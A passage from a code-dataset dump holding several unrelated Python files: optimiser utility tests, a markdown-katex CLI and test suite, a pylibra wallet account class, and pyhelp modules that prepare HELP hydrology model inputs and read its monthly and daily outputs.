0, "foo", 1.2, 3.4, None, False, False, True, True, False, 42, None
),
util.Param(
1, "bar", 3.4, 4.5, None, False, False, True, True, False, 42, None
),
]
)
assert repr(p) == repr((p[0], p[1]))
assert p[0].number == 0
assert p[1].number == 1
assert p["foo"].number == 0
assert p["bar"].number == 1
def test_MError():
me = util.MError(
1,
"x",
0.1,
0.2,
True,
True,
True,
False,
False,
False,
False,
False,
False,
11,
0.7,
)
assert repr(me) == (
"<MError number=1 name='x' lower=0.1 upper=0.2 is_valid=True lower_valid=True "
"upper_valid=True at_lower_limit=False at_upper_limit=False "
"at_lower_max_fcn=False at_upper_max_fcn=False lower_new_min=False "
"upper_new_min=False nfcn=11 min=0.7>"
)
assert me == util.MError(
1,
"x",
0.1,
0.2,
True,
True,
True,
False,
False,
False,
False,
False,
False,
11,
0.7,
)
assert me != util.MError(
1,
"x",
0.1,
0.2,
True,
True,
True,
False,
False,
False,
False,
False,
False,
11,
0.8,
)
def test_MErrors():
mes = util.MErrors(
x=util.MError(
1,
"x",
0.1,
0.2,
True,
True,
True,
False,
False,
False,
False,
False,
False,
11,
0.7,
)
)
assert repr(mes) == f"<MErrors\n {mes['x']!r}\n>"
def test_FMin():
fm = Namespace(
fval=1.23456e-10,
edm=1.23456e-10,
errordef=0.5,
is_valid=True,
has_valid_parameters=True,
has_accurate_covar=True,
has_posdef_covar=True,
has_made_posdef_covar=False,
hesse_failed=False,
has_covariance=True,
is_above_max_edm=False,
has_reached_call_limit=False,
has_parameters_at_limit=False,
state=[],
)
fmin = util.FMin(fm, 1, 2, 0.1)
assert {x for x in dir(fmin) if not x.startswith("_")} == {
"edm",
"edm_goal",
"errordef",
"fval",
"nfcn",
"ngrad",
"is_valid",
"has_accurate_covar",
"has_valid_parameters",
"has_posdef_covar",
"has_made_posdef_covar",
"hesse_failed",
"has_covariance",
"is_above_max_edm",
"has_reached_call_limit",
"has_parameters_at_limit",
}
assert fmin.edm == 1.23456e-10
assert fmin.edm_goal == 0.1
assert fmin.has_parameters_at_limit == False
assert fmin == util.FMin(fm, 1, 2, 0.1)
assert fmin != util.FMin(fm, 1, 2, 0.3)
assert repr(fmin) == (
"<FMin edm=1.23456e-10 edm_goal=0.1 errordef=0.5 fval=1.23456e-10"
" has_accurate_covar=True has_covariance=True has_made_posdef_covar=False"
" has_parameters_at_limit=False has_posdef_covar=True"
" has_reached_call_limit=False has_valid_parameters=True"
" hesse_failed=False is_above_max_edm=False is_valid=True"
" nfcn=1 ngrad=2>"
)
def test_normalize_limit():
assert util._normalize_limit(None) == (-util.inf, util.inf)
assert util._normalize_limit((None, 2)) == (-util.inf, 2)
assert util._normalize_limit((2, None)) == (2, util.inf)
assert util._normalize_limit((None, None)) == (-util.inf, util.inf)
with pytest.raises(ValueError):
util._normalize_limit((3, 2))
def test_guess_initial_step():
assert util._guess_initial_step(0) == 0.1
assert util._guess_initial_step(1) == 0.01
def test_address_of_cfunc():
nb = pytest.importorskip("numba")
nb_sig = nb.types.double(nb.types.uintc, nb.types.CPointer(nb.types.double))
@nb.cfunc(nb_sig)
def fcn(n, x):
x = nb.carray(x, (n,))
r = 0.0
for i in range(n):
r += (x[i] - i) ** 2
return r
from ctypes import cast, c_void_p, CFUNCTYPE, POINTER, c_double, c_uint32
address = cast(fcn.ctypes, c_void_p).value
assert util._address_of_cfunc(fcn) == address
# let's see if we can call the function pointer, going full circle
c_sig = CFUNCTYPE(c_double, c_uint32, POINTER(c_double))
c_fcn = cast(address, c_sig)
v = np.array((1.0, 2.0))
assert c_fcn(2, v.ctypes.data_as(POINTER(c_double))) == 2.0
def test_address_of_cfunc_bad_signature():
nb = pytest.importorskip("numba")
nb_sig = nb.types.double(nb.types.double, nb.types.CPointer(nb.types.double))
@nb.cfunc(nb_sig)
def fcn(y, x):
return 0
assert util._address_of_cfunc(fcn) == 0
``` |
{
"source": "jnsdrtlf/markdown-katex",
"score": 3
} |
#### File: src/markdown_katex/__main__.py
```python
import sys
import json
import typing as typ
import subprocess as sp
import markdown_katex
from markdown_katex import html
try:
import pretty_traceback
pretty_traceback.install()
except ImportError:
pass # no need to fail because of missing dev dependency
ExitCode = int
def _selftest() -> ExitCode:
# pylint:disable=import-outside-toplevel ; lazy import to improve cli responsiveness
from markdown_katex import wrapper
print("Command options:")
print(json.dumps(wrapper.parse_options(), indent=4))
print()
html_parts: typ.List[str] = []
test_formulas = markdown_katex.TEST_FORMULAS
for tex_formula in test_formulas:
html_part = wrapper.tex2html(tex_formula)
if not html_part:
return 1
html_parts.append(html_part)
formula_html = "\n<hr/>\n".join(html_parts)
html_text = html.HTML_TEMPLATE.replace("{{content}}", formula_html)
with open("test.html", mode="wb") as fobj:
fobj.write(html_text.encode("utf-8"))
print("Created 'test.html'")
return 0
def main(args: typ.Sequence[str] = sys.argv[1:]) -> ExitCode:
"""Basic wrapper around the katex command.
This is mostly just used for self testing.
$ python -m markdown_katex
"""
# pylint:disable=dangerous-default-value ; mypy will catch mutations of args
if "--markdown-katex-selftest" in args:
return _selftest()
bin_cmd = markdown_katex.get_bin_cmd()
if "--version" in args or "-V" in args:
version = markdown_katex.__version__
bin_str = " ".join(bin_cmd)
print("markdown-katex version: ", version, f"(using binary: {bin_str})")
return sp.check_call(bin_cmd + list(args))
if __name__ == '__main__':
sys.exit(main())
```
#### File: markdown-katex/test/test_mdkatex.py
```python
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import io
import re
import tempfile
import textwrap
from xml.etree.ElementTree import XML
import bs4
import pytest
import markdown as md
import pathlib2 as pl
import markdown_katex
import markdown_katex.wrapper as wrp
import markdown_katex.extension as ext
DATA_DIR = pl.Path(__file__).parent.parent / "fixture_data"
DATA_DIR.mkdir(parents=True, exist_ok=True)
TMP_DIR = pl.Path(tempfile.gettempdir()) / "mdkatex"
BASIC_TEX_TXT = r"""
f(x) = \int_{-\infty}^\infty
\hat f(\xi)\,e^{2 \pi i \xi x}
\,d\xi
"""
TEX_WITH_SVG_OUTPUT = "\\utilde{AB}"
BASIC_BLOCK_TXT = "```math\n" + BASIC_TEX_TXT + "```"
DEFAULT_MKDOCS_EXTENSIONS = ['meta', 'toc', 'tables', 'fenced_code']
EXTENDED_BLOCK_TXT = r"""
# Heading
prelude
```math
{0}
```
postscript
"""
EXTENDED_HTML_TEMPLATE = r"""
<h1 id="heading">Heading</h1>
<p>prelude</p>
<p>{0}</p>
<p>postscript</p>
"""
@pytest.fixture()
def katex_output():
path = DATA_DIR / "katex_output.html"
with path.open(mode="r") as fobj:
return fobj.read()
def test_svg2img(katex_output):
assert "<svg" in katex_output
assert "</svg>" in katex_output
assert "<img" not in katex_output
result = ext.svg2img(katex_output)
assert "<img" in result
out_path = DATA_DIR / "katex_output_no_inline_svg.html"
with out_path.open(mode="w") as fobj:
fobj.write(result)
def test_regexp():
assert ext.MATH_FENCE_RE.match(BASIC_BLOCK_TXT)
alt_block_text = BASIC_BLOCK_TXT.replace("```", "~~~")
assert ext.MATH_FENCE_RE.match(alt_block_text)
INLINE_TEST_CASES = {
"1 pre `a+b` post" : [],
"2 pre $`a+b` post" : [],
"3 pre `a+b`$ post" : [],
"4 pre $`a+b`$ post" : ["$`a+b`$"],
"5 pre $``a+b``$ post" : ["$``a+b``$"],
"6 pre``$`a+b`$`` post": [],
"7 pre``$`a+b`$`` post": [],
# multimatch
"1 pre $a+b`$ inter $c+d`$ post" : [],
"2 pre $`a+b`$ inter $`c+d`$ post" : ["$`a+b`$", "$`c+d`$"],
"3 pre $``a+b``$ inter $``c+d``$ post": ["$``a+b``$", "$``c+d``$"],
}
@pytest.mark.parametrize("line, expected", INLINE_TEST_CASES.items())
def test_inline_parsing(line, expected):
result = [code_item.inline_text for code_item in ext.iter_inline_katex(line)]
assert result == expected
def test_inline_multiple():
md_text = textwrap.dedent(
"""
# headline
Pre $`a+b`$ inter 1 $`c+d`$ inter 2 $`e+f`$ post
"""
)
result = md.markdown(md_text, extensions=['markdown_katex'])
assert "tmp_md_katex" not in result
assert result.strip().startswith(ext.KATEX_STYLES.strip())
# check that spans were added
assert result.count('<span class="katex"><') == 3
# check that markers were replaced
assert '<span class="katex">katex' not in result
def test_determinism():
html_data1 = markdown_katex.tex2html(BASIC_TEX_TXT)
html_data2 = markdown_katex.tex2html(BASIC_TEX_TXT)
assert html_data1 == html_data2
def test_tex2html():
assert len(markdown_katex.TEST_FORMULAS) > 1
for formula in markdown_katex.TEST_FORMULAS:
md_text = "```math\n{0}\n```".format(formula)
html_text = ext.md_block2html(md_text)
assert html_text.startswith('<span class="katex-display"')
assert html_text.endswith("</span>")
md_text = "$`{0}`$".format(formula)
html_text = ext.md_inline2html(md_text)
assert html_text.startswith('<span class="katex"')
assert html_text.endswith("</span>")
def test_basic_block():
html_data = markdown_katex.tex2html(BASIC_TEX_TXT)
# with open("debug_output_katex.html", mode="w") as fobj:
# fobj.write(html_data)
assert '<span class="katex' in html_data
no_inline_svg = ext.md_block2html(BASIC_BLOCK_TXT, default_options={'no_inline_svg': False})
default_output = ext.md_block2html(BASIC_BLOCK_TXT)
assert no_inline_svg == default_output
assert default_output
assert default_output.startswith('<span class="katex-display"')
expected = "<p>{}</p>".format(default_output)
result = md.markdown(BASIC_BLOCK_TXT, extensions=['markdown_katex'])
assert "tmp_md_katex" not in result
assert default_output in result
assert result.strip().startswith(ext.KATEX_STYLES.strip())
assert result.endswith(expected)
BASIC_TEX = r"e^{2 \pi i \xi x}"
INLINE_MD_TMPL = """
# Headline
prelude {0} interlude {1} postscript.
"""
def test_inline_basic():
inline_txt = "$`" + BASIC_TEX + "`$"
inline_output = ext.md_inline2html(inline_txt)
assert '<span class="katex"' in inline_output
inline_md_txt = INLINE_MD_TMPL.format(inline_txt, inline_txt)
result = md.markdown(inline_md_txt, extensions=['markdown_katex'])
assert "tmp_md_katex" not in result
assert '<span class="katex"' in result
assert "Headline" in result
assert "prelude" in result
assert "interlude" in result
assert "postscript" in result
assert result.count(inline_output) == 2
assert result.strip().startswith(ext.KATEX_STYLES.strip())
def test_trailing_whitespace():
default_output = ext.md_block2html(BASIC_BLOCK_TXT)
trailing_space_result = md.markdown(BASIC_BLOCK_TXT + " ", extensions=['markdown_katex'])
assert "tmp_md_katex" not in trailing_space_result
assert default_output in trailing_space_result
assert "```" not in trailing_space_result
def test_inline_quoted():
inline_txt = "$`" + BASIC_TEX + "`$"
quoted_inline_txt = "``$`" + BASIC_TEX + "`$``"
inline_output = ext.md_inline2html(inline_txt)
inline_md_txt = INLINE_MD_TMPL.format(inline_txt, quoted_inline_txt)
result = md.markdown(inline_md_txt, extensions=['markdown_katex'])
assert "tmp_md_katex" not in result
assert result.count(inline_output) == 1
assert "span id=\"katex" not in result
inline_md_txt = INLINE_MD_TMPL.format(quoted_inline_txt, inline_txt)
result = md.markdown(inline_md_txt, extensions=['markdown_katex'])
assert "tmp_md_katex" not in result
assert result.count(inline_output) == 1
assert "span id=\"katex" not in result
def test_marker_uniqueness():
inline_md_txt = "\n\n".join(
["start", "$`a+b`$", "interlude", "$``c+d``$", "interlude", "$``a+b``$", "end"]
)
md_ctx = md.Markdown(extensions=['markdown_katex'])
preproc = next(
iter((pp for pp in md_ctx.preprocessors if isinstance(pp, ext.KatexPreprocessor)))
)
out_lines = preproc.run(inline_md_txt.splitlines())
md_output = "\n".join(out_lines)
assert md_output.count("span id=\"tmp_md_katex") == 3
marker_ids = [
match.group(1) for match in re.finditer(r"span id=\"tmp_md_katex(\d+)", md_output)
]
assert len(set(marker_ids)) == 2
def test_svg_uniqueness():
md_text = "\n\n".join(
[
"start",
"$`a+b`$",
"interlude",
"$`c+d`$",
"interlude",
"```math\na+b\n```",
"interlude",
"```math\ne+f\n```",
"interlude",
"```math\na+b\n```",
"interlude",
"prefix $`a+b`$ suffix",
"end",
]
)
html_output = md.markdown(md_text, extensions=['markdown_katex'])
assert "tmp_md_katex" not in html_output
# check whitespace
assert "prefix <span " in html_output
assert "</span> suffix" in html_output
fobj = io.StringIO(html_output)
soup = bs4.BeautifulSoup(fobj, "html.parser")
results = set()
for tag in soup.find_all("span", attrs={'class': "katex"}):
results.add(str(tag))
assert len(results) == 4
def test_no_inline_svg():
inline_md_txt = "$`" + TEX_WITH_SVG_OUTPUT + "`$"
inline_output = ext.md_inline2html(inline_md_txt)
assert '<span class="katex"' in inline_output
assert "<svg" in inline_output
assert "<img" not in inline_output
inline_output = ext.md_inline2html(inline_md_txt, default_options={'no_inline_svg': True})
assert '<span class="katex"' in inline_output
assert "<svg" not in inline_output
assert "<img" in inline_output
result = md.markdown(
INLINE_MD_TMPL.format(inline_md_txt, inline_md_txt),
extensions=['markdown_katex'],
extension_configs={'markdown_katex': {'no_inline_svg': True}},
)
assert "tmp_md_katex" not in result
assert '<span class="katex"' in result
assert "<svg" not in result
assert "<img" in result
def test_insert_fonts_css():
result = md.markdown(
BASIC_BLOCK_TXT,
extensions=['markdown_katex'],
extension_configs={'markdown_katex': {'insert_fonts_css': True}},
)
assert "tmp_md_katex" not in result
assert result.startswith(ext.KATEX_STYLES.strip())
result = md.markdown(
BASIC_BLOCK_TXT,
extensions=['markdown_katex'],
extension_configs={'markdown_katex': {'insert_fonts_css': False}},
)
assert "tmp_md_katex" not in result
assert not result.startswith(ext.KATEX_STYLES.strip())
def test_err_msg():
invalid_md_txt = r"$`e^{2 \pi i \xi x`$"
md_txt = INLINE_MD_TMPL.format(invalid_md_txt, invalid_md_txt)
try:
md.markdown(md_txt, extensions=['markdown_katex'])
assert False, "expected an exception"
except wrp.KatexError as err:
err_msg = err.args[0]
assert "ParseError: KaTeX parse error:" in err_msg
assert "Expected '}'" in err_msg
def test_bin_paths():
assert wrp._get_pkg_bin_path().exists()
assert wrp._get_pkg_bin_path(machine="x86_64", osname="Windows").exists()
assert wrp._get_pkg_bin_path(machine="AMD64", osname="Windows").exists()
assert wrp._get_pkg_bin_path(machine="x86_64", osname="Linux").exists()
assert wrp._get_pkg_bin_path(machine="x86_64", osname="Darwin").exists()
assert str(wrp._get_pkg_bin_path(machine="AMD64", osname="Windows")).endswith(".exe")
def test_html_output():
# NOTE: This generates html that is to be tested
# in the browser (for warnings in devtools).
assert len(markdown_katex.TEST_FORMULAS) > 1
md_parts = []
for formula in markdown_katex.TEST_FORMULAS:
inline_formula = formula.replace("\n", " ").strip()
md_parts.append("Inline: $`" + inline_formula + "`$")
md_parts.append("\n\n---\n\n```math" + formula + "\n```")
md_text = "# Headline\n\n" + "\n".join(md_parts)
result = md.markdown(
md_text,
extensions=DEFAULT_MKDOCS_EXTENSIONS + ['markdown_katex'],
extension_configs={'markdown_katex': {'no_inline_svg': True}},
)
assert "tmp_md_katex" not in result
html = """
<html>
<head>
<style>
body {
background: white;
}
@media print {
@page {
/* A4 - landscape */
padding: 0;
margin: 20mm;
size: 297mm 210mm;
}
}
</style>
</head>
<body>
{{result}}
</body>
</html>
"""
html = textwrap.dedent(html.lstrip("\n"))
html = html.replace("{{result}}", result)
tmp_file = TMP_DIR / "test_output.html"
with tmp_file.open(mode="w", encoding="utf-8") as fobj:
fobj.write(html)
def test_valid_xml():
md_text = textwrap.dedent(
r"""
Look at these formulas:
```math
f(x) = 0
```
"""
)
extensions = DEFAULT_MKDOCS_EXTENSIONS + ['markdown_katex']
result = md.markdown(
md_text,
extensions=extensions,
extension_configs={'markdown_katex': {'no_inline_svg': True}},
)
# avoid xml.etree.ElementTree.ParseError: junk after document element:
# XML expects a single root object containing all the others
result = "<div>" + result + "</div>"
# assert no exception
XML(result)
def test_ignore_in_non_math_block():
md_text = textwrap.dedent(
r"""
Look at these formulas:
```
This math is in a block $`a^2+b^2=c^2`$.
```
And also this code:
```python
def randint() -> int:
return 4
```
And this code:
~~~javascript
function randint() {
return 4;
}
~~~
"""
)
result_a = md.markdown(
md_text,
extensions=DEFAULT_MKDOCS_EXTENSIONS + ['markdown_katex'],
extension_configs={'markdown_katex': {'no_inline_svg': True}},
)
result_b = md.markdown(
md_text,
extensions=DEFAULT_MKDOCS_EXTENSIONS,
)
assert "tmp_md_katex" not in result_a
assert "tmp_md_katex" not in result_b
assert "katex" not in result_a
assert "katex" not in result_b
assert result_a == result_b
assert "<pre><code>This math is in" in result_a
assert re.search(r'<pre><code class="(language-)?python">def randint', result_a)
assert re.search(r'<pre><code class="(language-)?javascript">function randint', result_a)
def test_macro_file():
md_text = textwrap.dedent(
"""
prelude
```math
\\macroname{aaaAAA}{bbbBBB}
```
postscript
"""
)
macro_text = textwrap.dedent(
"""
% macros.tex
\\macroname:\\text{prefix} \\text{#2} \\text{interlude} \\text{#1} \\text{suffix}
"""
)
with tempfile.NamedTemporaryFile(suffix=".tex") as fobj:
fobj.write(macro_text.encode("ascii"))
fobj.flush()
macro_file = fobj.name
result = md.markdown(
md_text,
extensions=DEFAULT_MKDOCS_EXTENSIONS + ['markdown_katex'],
extension_configs={'markdown_katex': {'no_inline_svg': True, 'macro-file': macro_file}},
)
assert "tmp_md_katex" not in result
assert "prefix" in result
assert "interlude" in result
assert "suffix" in result
assert result.index("bbbBBB") < result.index("aaaAAA")
def test_md_in_html():
md_text = textwrap.dedent(
"""
<div markdown="1">
```math
a^2+b^2=c^2
```
$`a^3+b^3=c^3`$
</div>
"""
)
result = md.markdown(
md_text,
extensions=DEFAULT_MKDOCS_EXTENSIONS + ['markdown_katex', 'extra'],
extension_configs={'markdown_katex': {'no_inline_svg': True}},
)
assert "tmp_md_katex" not in result
assert '<span class="katex-display">' in result
assert '<span class="katex">' in result
``` |
{
"source": "jnsead/pylibra",
"score": 3
} |
#### File: pylibra/wallet/account.py
```python
from sha3 import sha3_256
from nacl.signing import SigningKey
class Account(object):
def __init__(self, private_key):
self._signing_key = SigningKey(bytes.fromhex(private_key))
self._verify_key = self._signing_key.verify_key
shazer = sha3_256()
shazer.update(self._verify_key.encode())
self.address = shazer.digest().hex()
def sign(self, message):
return self._signing_key.sign(message)
@property
def public_key(self):
return self._verify_key.encode().hex()
@property
def private_key(self):
return self._signing_key.encode().hex()
``` |
{
"source": "jnsebgosselin/help",
"score": 3
} |
#### File: help/pyhelp/preprocessing.py
```python
import csv
import time
import os.path as osp
import multiprocessing as mp
from multiprocessing import Pool
MINEDEPTH = 3
MAXEDEPTH = 80
MINTHICK = 10
# ---- Evapotranspiration and Soil and Design data (D10 and D11)
def _format_d11_singlecell(row):
"""
Format the D11 input data for a single cell (one row in the excel file).
"""
nlayers = int(row['nlayer'])
if nlayers == 0:
# This means this cell cannot be run in HELP.
return None
iu11 = 2
try:
city = str(int(row['cid']))
except ValueError:
city = str(row['cid'])
ulat = float(row['lat_dd'])
ipl = int(row['growth_start'])
ihv = int(row['growth_end'])
ulai = float(row['LAI'])
edepth = float(row['EZD'])
edepth = min(max(edepth, MINEDEPTH), MAXEDEPTH)
wind = float(row['wind'])
hum1 = float(row['hum1'])
hum2 = float(row['hum2'])
hum3 = float(row['hum3'])
hum4 = float(row['hum4'])
d11dat = []
# READ (11, 5050) IU11, CITY11
# 5050 FORMAT (I2/A40)
d11dat.append(['{0:>2}'.format(iu11)])
d11dat.append(['{0:<40}'.format(city)])
# READ (11, 5060) ULAT, IPL, IHV, ULAI, EDEPTH, WIND, HUM1, HUM2,
# HUM3, HUM4
# 5060 FORMAT (F10.2,I4,I4,F7.0,F8.0,5F5.0)
d11dat.append(['{0:<10.2f}'.format(ulat) +
'{0:>4}'.format(ipl) +
'{0:>4}'.format(ihv) +
'{0:>7.2f}'.format(ulai) +
'{0:>8.1f}'.format(edepth) +
'{0:>5.1f}'.format(wind) +
'{0:>5.1f}'.format(hum1) +
'{0:>5.1f}'.format(hum2) +
'{0:>5.1f}'.format(hum3) +
'{0:>5.1f}'.format(hum4)])
return d11dat
def _format_d10_singlecell(row):
"""
Format the D10 input data for a single cell (corresponds to a single row
in the input csv file).
"""
nlayers = int(row['nlayer'])
if nlayers == 0:
# This means this cell cannot be run in HELP.
return None
try:
title = str(int(row['cid']))
except ValueError:
title = str(row['cid'])
iu10 = 2
ipre = 0
irun = 1
osno = 0 # initial snow water
area = 6.25 # area projected on horizontal plane
frunof = 100
runof = float(row['CN'])
d10dat = []
# READ (10, 5070) TITLE
# 5070 FORMAT(A60)
d10dat.append(['{0:<60}'.format(title)])
# READ (10, 5080) IU10, IPRE, OSNO, AREA, FRUNOF, IRUN
# 5080 FORMAT(I2,I2,2F10.0,F6.0,I2)
d10dat.append(['{0:>2}'.format(iu10) +
'{0:>2}'.format(ipre) +
'{0:>10.0f}'.format(osno) +
'{0:>10.0f}'.format(area) +
'{0:>6.0f}'.format(frunof) +
'{0:>2}'.format(irun)])
# IF (IRUN .EQ. 1) READ (10, 5090) CN2
# 5090 FORMAT(F7.0)
d10dat.append(['{0:>7.0f}'.format(runof)])
# Format the layer properties.
for i in range(nlayers):
lay = str(i+1)
layer = int(row['lay_type'+lay])
thick = max(float(row['thick'+lay]), MINTHICK)
isoil = 0
poro = float(row['poro'+lay])
fc = float(row['fc'+lay])
wp = float(row['wp'+lay])
sw = ''
rc = float(row['ksat'+lay])
xleng = float(row['dist_dr'+lay])
slope = float(row['slope'+lay])
# Check that all values are valid for the layer.
check = [val == -9999 for val in
(thick, poro, fc, wp, rc, xleng, slope)]
if any(check):
return None
# READ (10, 5120) LAYER (J), THICK (J), ISOIL (J),
# PORO (J), FC (J), WP (J), SW (J), RC (J)
# 5120 FORMAT(I2,F7.0,I4,4F6.0,F16.0)
d10dat.append(['{0:>2}'.format(layer) +
'{0:>7.0f}'.format(thick) +
'{0:>4}'.format(isoil) +
'{0:>6.3f}'.format(poro) +
'{0:>6.3f}'.format(fc) +
'{0:>6.3f}'.format(wp) +
'{0:>6}'.format(sw) +
'{0:>16.14f}'.format(rc)])
recir = subin = phole = defec = ipq = trans = ''
layr = 0
# READ (10, 5130) XLENG (J), SLOPE (J), RECIR (J), LAYR (J),
# SUBIN (J), PHOLE (J), DEFEC (J), IPQ (J), TRANS (J)
# 5130 FORMAT(F7.0,2F6.0,I3,F13.0,2F7.0,I2,G14.6)
d10dat.append(['{0:>7.0f}'.format(xleng) +
'{0:>6.2f}'.format(slope) +
'{0:>6}'.format(recir) +
'{0:>3}'.format(layr) +
'{0:>13}'.format(subin) +
'{0:>7}'.format(phole) +
'{0:>7}'.format(defec) +
'{0:>2}'.format(ipq) +
'{0:>14}'.format(trans)])
return d10dat
def format_d10d11_inputs(grid, cellnames):
"""
Format the evapotranspiration (D11) and soil and design data (D10) in a
format that is compatible with HELP.
"""
tic = time.perf_counter()
d11dat = {}
d10dat = {}
N = len(cellnames)
for i, cid in enumerate(cellnames):
print("\rFormatting D10 and D11 data for cell %d of %d (%0.1f%%)" %
(i+1, N, (i+1)/N*100), end=' ')
row = grid.loc[cid]
d11dat[cid] = _format_d11_singlecell(row)
d10dat[cid] = _format_d10_singlecell(row)
print("\rFormatting D10 and D11 data for cell %d of %d (%0.1f%%)" %
(i+1, N, (i+1)/N*100))
tac = time.perf_counter()
print('Task completed in %0.2f sec' % (tac-tic))
warnings = [cid for cid, val in d10dat.items() if val is None]
if warnings:
print('-' * 25)
msg = "Warning: the data for "
msg += "cell " if len(warnings) == 1 else "cells "
msg += ", ".join(warnings)
msg += " are not formatted correctly."
print(msg)
print('-' * 25)
return d10dat, d11dat
def write_d10d11_singlecell(packed_data):
"""Write the content of cell in a D10 and D11 file."""
fname, cid, d10data = packed_data
if d10data is None:
fname = None
else:
with open(fname, 'w') as csvfile:
writer = csv.writer(csvfile, lineterminator='\n')
writer.writerows(d10data)
return {cid: fname}
def write_d10d11_allcells(dirpath, d10data, d11data, ncore=None):
"""
Write the content of each cell in individual D10 and D11 files.
"""
ncore = max(mp.cpu_count() if ncore is None else ncore, 1)
pool = Pool(ncore)
# Prepare soil and design input files (D10).
tic = time.perf_counter()
iterable = [(osp.join(dirpath, str(cid) + '.D10'), cid, d10data[cid]) for
cid in d10data.keys()]
d10_connect_table = {}
calcul_progress = 0
N = len(iterable)
for i in pool.imap_unordered(write_d10d11_singlecell, iterable):
d10_connect_table.update(i)
calcul_progress += 1
progress_pct = calcul_progress/N*100
print("\rCreating D10 input file for cell %d of %d (%0.1f%%)" %
(calcul_progress, N, progress_pct), end=' ')
tac = time.perf_counter()
print('\nTask completed in %0.2f sec' % (tac-tic))
# Prepare evapotranspiration input files (D11).
tic = time.perf_counter()
iterable = [(osp.join(dirpath, str(cid) + '.D11'), cid, d11data[cid]) for
cid in d10data.keys()]
d11_connect_table = {}
calcul_progress = 0
N = len(iterable)
for i in pool.imap_unordered(write_d10d11_singlecell, iterable):
d11_connect_table.update(i)
calcul_progress += 1
progress_pct = calcul_progress/N*100
print("\rCreating D11 input file for cell %d of %d (%0.1f%%)" %
(calcul_progress, N, progress_pct), end=' ')
tac = time.perf_counter()
print('\nTask completed in %0.2f sec' % (tac-tic))
return d10_connect_table, d11_connect_table
```
#### File: help/pyhelp/processing.py
```python
import os
import os.path as osp
from multiprocessing import Pool
import multiprocessing as mp
import time
import csv
import calendar
# ---- Third Party imports
import numpy as np
# ---- Local Libraries Imports
from pyhelp import HELP3O
DEL_TEMPFILES = True
# ---- Run HELP
def run_help_singlecell(item):
"""Run HELP for a single cell."""
cellname, outparam = item
HELP3O.run_simulation(*outparam)
results = read_monthly_help_output(outparam[5])
if DEL_TEMPFILES:
os.remove(outparam[5])
return (cellname, results)
def run_help_allcells(cellparams, ncore=None):
"""Run HELP in batch for multiple cells."""
output = {}
ncore = max(mp.cpu_count() if ncore is None else ncore, 1)
tstart = time.perf_counter()
calcul_progress = 0
N = len(cellparams)
pool = Pool(ncore)
for cell in pool.imap_unordered(run_help_singlecell, cellparams.items()):
output[cell[0]] = cell[1]
calcul_progress += 1
progress_pct = calcul_progress/N*100
tpassed = time.perf_counter() - tstart
tremain = (100-progress_pct)*tpassed/progress_pct/60
print(('\rHELP simulation in progress: %3.1f%% (%0.1f min remaining)'
" ") % (progress_pct, tremain), end='')
calcul_time = (time.perf_counter() - tstart)
print('\nTask completed in %0.2f sec' % calcul_time)
return output
# ---- Read HELP output
def read_monthly_help_output(filename):
"""
Read the monthly output from .OUT HELP file and return the data as
numpy arrays stored in a dictionary. Support the output format that was
modified from HELP 3.07 (see PR#2).
"""
with open(filename, 'r') as csvfile:
csvread = list(csv.reader(csvfile))
arr_years = []
vstack_precip = []
vstack_runoff = []
vstack_evapo = []
vstack_subrun1 = []
vstack_subrun2 = []
vstack_percol = []
vstack_rechg = []
year = None
i = 0
while True:
if i+1 >= len(csvread):
break
if len(csvread[i]) == 0:
i += 1
continue
line = csvread[i][0]
if 'MONTHLY TOTALS' in line:
year = int(line.split()[-1])
arr_years.append(year)
subrun1 = None
subrun2 = np.zeros(12).astype('float32')
percol = None
while True:
i += 1
if len(csvread[i]) == 0:
continue
line = csvread[i][0]
if '**********' in line:
break
elif 'PRECIPITATION' in line:
precip = np.array(line.split()[-12:]).astype('float32')
elif 'RUNOFF' in line:
runoff = np.array(line.split()[-12:]).astype('float32')
elif 'EVAPOTRANSPIRATION' in line:
evapo = np.array(line.split()[-12:]).astype('float32')
elif 'LAT. DRAINAGE' in line:
if subrun1 is None:
subrun1 = np.array(
line.split()[-12:]).astype('float32')
else:
subrun2 += np.array(
line.split()[-12:]).astype('float32')
elif 'PERCOLATION' in line:
if percol is None:
percol = np.array(line.split()[-12:]).astype('float32')
rechg = np.array(line.split()[-12:]).astype('float32')
vstack_precip.append(precip)
vstack_runoff.append(runoff)
vstack_evapo.append(np.array(evapo).astype('float32'))
vstack_rechg.append(np.array(rechg).astype('float32'))
vstack_percol.append(np.array(percol).astype('float32'))
if subrun1 is None:
vstack_subrun1.append(np.zeros(12).astype('float32'))
else:
vstack_subrun1.append(subrun1)
vstack_subrun2.append(subrun2)
elif 'FINAL WATER STORAGE' in line:
break
i += 1
data = {'years': np.array(arr_years).astype('uint16'),
'precip': np.vstack(vstack_precip),
'runoff': np.vstack(vstack_runoff),
'evapo': np.vstack(vstack_evapo),
'subrun1': np.vstack(vstack_subrun1),
'subrun2': np.vstack(vstack_subrun2),
'perco': np.vstack(vstack_percol),
'rechg': np.vstack(vstack_rechg)}
return data
def read_daily_help_output(filename):
"""
Read the daily output from .OUT HELP file and return the data as
numpy arrays stored in a dictionary.
"""
with open(filename, 'r') as csvfile:
csvread = list(csv.reader(csvfile))
nlay = None
arr_years = []
arr_days = []
arr_rain = []
arr_ru = []
arr_et = []
arr_ezone = []
arr_headfirst = []
arr_drainfirst = []
arr_leakfirst = []
arr_leaklast = []
year = None
nlay = nsub = None
for i, line in enumerate(csvread):
if line:
line = line[0]
if 'TOTAL NUMBER OF LAYERS' in line:
nlay = int(line.split()[-1])
elif 'TOTAL NUMBER OF SUBPROFILES' in line:
nsub = int(line.split()[-1])
if 'DAILY OUTPUT FOR YEAR' in line:
year = int(line.split()[-1])
days_in_year = 366 if calendar.isleap(year) else 365
elif year is not None:
try:
day = int(line[2:5])
rain = float(line[13:19])
ru = float(line[19:26])
et = float(line[26:33])
ezone = float(line[33:41])
headfirst = float(line[41:51])
drainfirst = float(line[51:61])
leakfirst = float(line[61:71])
leaklast = float(line[-10:])
except ValueError:
pass
else:
arr_years.append(year)
arr_days.append(day)
arr_rain.append(rain)
arr_ru.append(ru)
arr_et.append(et)
arr_ezone.append(ezone)
arr_headfirst.append(headfirst)
arr_drainfirst.append(drainfirst)
arr_leakfirst.append(leakfirst)
arr_leaklast.append(leaklast)
if day == days_in_year:
year = None
dataf = {'years': np.array(arr_years).astype('uint16'),
'days': np.array(arr_days).astype('uint16'),
'rain': np.array(arr_rain).astype('float32'),
'runoff': np.array(arr_ru).astype('float32'),
'et': np.array(arr_et).astype('float32'),
'ezone': np.array(arr_ezone).astype('float32'),
